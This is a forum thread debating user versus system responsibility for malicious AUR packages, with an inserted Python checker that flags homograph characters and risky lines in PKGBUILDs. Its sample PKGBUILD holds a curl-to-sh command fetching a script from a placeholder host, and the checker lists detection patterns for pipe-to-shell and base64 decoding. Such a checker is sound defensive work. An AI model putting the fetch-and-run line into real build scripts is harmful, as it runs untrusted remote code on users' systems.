Malicious AUR packages

That’s what I’ve always found surprising: that so many popular, upvoted packages in the AUR haven’t made it to the default Arch repos. I actually recently found out that mullvad-vpn has made it to the extra repo.

It wasn’t there the last time I used Mullvad, so I thought it would be a good occasion to renew for another year.

I also found that out some weeks ago. So I switched to the extra package.

BTW, as someone on the AUR mailing list pointed out, reading the PKGBUILD won’t really save you either, since there are homograph attacks (mostly non-Latin characters that look like Latin characters, or I vs l depending on your font). And then there’s what I already mentioned: a new line may look perfectly valid. Oh, it installs an npm package now? OK, but now what? Do I read the npm package to find out what it’s doing? How far down the rabbit hole are users expected to go?

TL;DR: I think blaming users for not being diligent enough is a lazy answer. There’s always more you could do.

If you have the slightest suspicion, you should do it. Or at least try as much as you can.

I didn’t know that. Thanks for pointing this out.

I think not accepting responsibility for YOUR system and blaming others for not taking YOUR system into consideration is a YOU problem and not a DEVELOPER problem.

Well, earlier in this topic I posted a link about this.

Didn’t recognize it. Too many answers to read … :wink:

Well, yes, but how far does that responsibility have to go for one to admit that the system itself is pretty faulted too when it comes to security? It’s a slippery slope on both sides of the argument in my eyes to solely accuse the user OR solely accuse the system itself.

He was very persistent & dogmatic in his arguments. The concept of “agreeing to disagree” was alien to him. He took this approach with the forum moderators as well as us humble members.

The final straw was the decision by the moderators to turn on the filter for some swearwords, following requests by some users. Despite the forum being a public space and not a private one, :frog: saw this as despicable and entirely contrary to his own cherished notion of free speech. The moderators eventually tired of his persistence & dogmatism on this issue and suspended him.

Too late if I may give my unasked HO on the matter. But you know as they say:

Better Late Than Sorry

:sweat_smile:

Perhaps the key is to have a break?

I agree it’s a faulted system, but at the end of the day it’s still YOUR responsibility for YOUR system. As a user I can’t understand the pains a developer would need to go through to understand and accommodate everyone’s unique setup/situation.

The fact is that this is an OPEN SOURCE project, and if you don’t like the way it’s currently being done then please, by all means, create a new system with a less flawed design. If you build it, they will come.

May it extend its break into retirement :rofl:

… including STDs. You have succinctly described the problem. :thinking:

Looking at the fact that the problem mostly comes from orphaned packages that get adopted by newly created user accounts, it seems there should be a bit more control and restriction on new AUR user accounts in some form, or something similar with auditing. What a workable form of that looks like is something the Arch devs and community will have to think about, and having read the most recent mails from the aur-general mailing list, that is what’s happening right now, or at least there’s brainstorming being done about this now.

You know that xkcd comic about standards? Yeah, let’s not do it unless there is no middle ground that can be found at all in regards to solving this.

Yes, it’s the user’s responsibility to make sure their system doesn’t get infected, but I don’t think it’s reasonable to expect them to spend more than 15 minutes or so to determine if a package from the AUR has malware or not. There’s also a skill issue that needs to be addressed, and seemingly no one wants to make it, at least to some degree, easy for newcomers by explaining what to look for in a PKGBUILD, but maybe I am wrong here.

Either way, this conversation is going in circles it seems. I don’t think it’s worth me regurgitating what I already said.
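A small checker along the lines of what the two posts above describe (homograph characters hidden in a PKGBUILD, and what a newcomer could look for in one before building), added here as an example; it is not code from the AUR, pacman, makepkg or anyone in this thread. The sample PKGBUILD, the heuristic patterns and the function names are all constructed for the example. It only reports things worth a second look; an empty report does not mean the package is safe.

```python
"""Added example (not AUR/pacman code): a heuristic PKGBUILD checker.

Two checks the thread talks about:
  1. homograph characters: any non-ASCII character, reported with its
     Unicode name, since a PKGBUILD is normally pure ASCII;
  2. things to look at before building: pipe-to-shell, build-time
     package-manager installs, base64 decoding, eval, and SKIP checksums.
The heuristics and the sample PKGBUILD below are constructed for this
example; "I vs l" tricks inside a Latin-only font are out of scope here.
"""
import re
import unicodedata

# Constructed sample: line 4 has a Cyrillic "е" (U+0435) in the GitHub
# owner name, line 5 skips checksums, line 9 pipes curl into sh.
SAMPLE_PKGBUILD = """\
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
source=("https://github.com/exampl\u0435/tool/archive/v$pkgver.tar.gz")
sha256sums=('SKIP')

build() {
  cd "$srcdir/tool-$pkgver"
  curl -s https://example.invalid/setup.sh | sh
  make
}

package() {
  make DESTDIR="$pkgdir" install
}
"""

# (pattern, reason) pairs; matched against each line with comments stripped.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "pipe-to-shell"),
    (re.compile(r"\b(npm|pnpm|yarn)\s+(i|install|add)\b|\bpip3?\s+install\b"),
     "package-manager install at build time"),
    (re.compile(r"\bbase64\b.*(\s-d\b|--decode)"), "base64 decode"),
    (re.compile(r"\beval\b"), "eval"),
    (re.compile(r"^\s*(md5|sha\d+|b2)sums\w*=.*\bSKIP\b"),
     "checksum SKIP (only expected for VCS sources)"),
]


def find_homographs(text):
    """Return (line, column, char, unicode_name) for every non-ASCII char."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for col, ch in enumerate(line, 1):
            if ord(ch) > 127:
                hits.append((n, col, ch, unicodedata.name(ch, "UNKNOWN")))
    return hits


def find_suspicious(text):
    """Return (line, reason) for every line matching a SUSPICIOUS pattern."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        code = line.split("#", 1)[0]  # ignore trailing comments
        for pat, why in SUSPICIOUS:
            if pat.search(code):
                hits.append((n, why))
    return hits


def lint(text):
    """Run both checks; an empty result means 'nothing obvious', not 'safe'."""
    return {"homographs": find_homographs(text),
            "suspicious": find_suspicious(text)}


if __name__ == "__main__":
    report = lint(SAMPLE_PKGBUILD)
    for n, col, ch, name in report["homographs"]:
        print(f"line {n} col {col}: non-ASCII {ch!r} ({name})")
    for n, why in report["suspicious"]:
        print(f"line {n}: {why}")
```

Run it against a real PKGBUILD with `lint(open("PKGBUILD").read())`. The non-ASCII check is deliberately blunt: a legitimate maintainer name in a comment will trip it too, but on a file that should be plain ASCII a handful of false positives is cheap compared with missing a Cyrillic letter in a source URL.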

That happens entirely too often (and no, I mean in general, not you). I am a firm believer in less is more and succinct speech. If you can’t say it in a paragraph, then it’s a skill issue.

No I don’t know what this is. But yes agree to disagree.
